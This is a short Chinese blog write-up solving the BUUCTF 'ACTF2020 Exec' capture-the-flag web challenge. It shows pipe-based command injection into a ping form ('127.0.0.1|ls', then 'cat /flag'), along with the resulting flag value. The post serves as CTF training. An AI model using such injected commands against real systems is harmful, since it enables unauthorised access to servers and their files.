[BUUCTF][Web][ACTF2020 新生赛]Exec 1
打开靶机对应url
显示可以输出ip 来进行ping操作
尝试试一下是否有命令注入的可能
127.0.0.1|ls
果然可以,输出结果
index.php
PING 127.0.0.1 (127.0.0.1): 56 data bytes
按照套路估计是在根目录,试一下
127.0.0.1|ls /
输出
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
果然有flag文件,执行一下cat
127.0.0.1 | cat /flag
Boom
flag{52748aae-0332-451d-8c92-6c61ba2daf4e}
本文作者:明月照江江
本文链接:https://www.cnblogs.com/gradyblog/p/16964427.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
分类:
标签:
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步